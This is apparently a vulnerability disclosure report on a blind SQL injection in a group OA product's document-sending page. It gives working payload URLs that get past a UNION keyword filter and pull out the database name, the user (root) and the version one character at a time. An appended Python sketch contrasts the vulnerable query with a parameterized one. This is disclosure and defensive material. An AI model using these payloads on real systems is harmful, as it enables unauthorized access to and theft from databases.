### Summary:
Latest version of the group OA: the single quote `'` is not filtered, the filter function can then be bypassed, and the database runs as root.
### Details:
Vendor site: http://**.**.**.**/
Group demo address: **.**.**.**/
SQL injection location:
```
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1
```
The `title` parameter is injectable.
This point does not filter the single quote `'` at all.
![1019-20.png](https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png)
Extracting the SQL statement. Submit:
```
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and 1=2 union select
```
![1019-21.png](https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png)
Response:
```
不安全的SQL语句:联合查询
select count(*) as total from doc_send_data as a where 1 = 1 and title like '%1%' and 1=2 union select%' and status='6' and a.creator='admin'
```
Then bypass the filter and construct the injection:
```
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(version())=41 and 'a%'='a
```
![1019-22.png](https://images.seebug.org/upload/201510/19183649c375a7ed001b5496615dc50dc5e49ea7.png)
The version length is determined to be 41.
Likewise, determine the lengths of `user` and `database`:
```
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(database())=5 and 'a%'='a
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(user())=14 and 'a%'='a
```
Construct the blind injection point:
```
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),1,1)),16,10)=116 and 'a%'='a
```
Run it directly with a script:
```
**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),{1},1)),16,10)={1} and 'a%'='a
```
![1015-database.png](https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png)
database
```
td_oa
```
![1015-user.png](https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png)
user
```
root@**.**.**.**
```
![1015-version.png](https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png)
version
```
5.5.36-enterprise-commercial-advanced-log
```
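As an added illustration, not code from the original report or the vendor: a Python sketch of the query shape quoted above, run against constructed sample rows in SQLite, showing that a UNION keyword blacklist does not stop the boolean condition used in the report, while binding `title` as a parameter does.

```python
import sqlite3

# Constructed sample rows (not from the report): creator, status, title
SAMPLE_ROWS = [
    ("admin", "6", "1 budget"),
    ("admin", "6", "memo"),
    ("bob", "6", "1 plan"),
]

def setup_db():
    """In-memory SQLite stand-in for the doc_send_data table named in the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table doc_send_data (creator text, status text, title text)")
    conn.executemany("insert into doc_send_data values (?, ?, ?)", SAMPLE_ROWS)
    return conn

def is_blocked_by_filter(title):
    """Keyword blacklist of the kind the 'unsafe SQL statement: union query' message
    suggests (assumed shape): it rejects UNION SELECT but lets boolean conditions through."""
    lowered = title.lower()
    return "union" in lowered and "select" in lowered

def count_vulnerable(conn, title, creator="admin"):
    """Query shape from the report, with title concatenated into the LIKE pattern."""
    if is_blocked_by_filter(title):
        raise ValueError("unsafe SQL statement: union query")
    sql = ("select count(*) as total from doc_send_data as a where 1 = 1 "
           "and title like '%" + title + "%' and status='6' "
           "and a.creator='" + creator + "'")
    return conn.execute(sql).fetchone()[0]

def count_safe(conn, title, creator="admin"):
    """Same query with bound parameters: the wildcards wrap the value, and the value
    is never parsed as SQL, so a quote inside it cannot change the WHERE clause."""
    sql = ("select count(*) as total from doc_send_data as a where 1 = 1 "
           "and title like ? and status='6' and a.creator=?")
    return conn.execute(sql, ("%" + title + "%", creator)).fetchone()[0]

if __name__ == "__main__":
    db = setup_db()
    true_cond = "1%' and 1=1 and 'a%'='a"
    false_cond = "1%' and 1=2 and 'a%'='a"
    # Vulnerable path: the count changes with the injected condition (a boolean oracle)
    print(count_vulnerable(db, true_cond), count_vulnerable(db, false_cond))  # 1 0
    # Safe path: both inputs are literal search strings that match nothing
    print(count_safe(db, true_cond), count_safe(db, false_cond))  # 0 0
```

The difference between the two counts in the vulnerable path is exactly the signal the length and character-by-character checks above rely on; with parameter binding that signal disappears regardless of what the blacklist catches.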
### Proof of vulnerability:
The database, user and version values recovered above (td_oa, root@**.**.**.**, 5.5.36-enterprise-commercial-advanced-log) and the corresponding screenshots.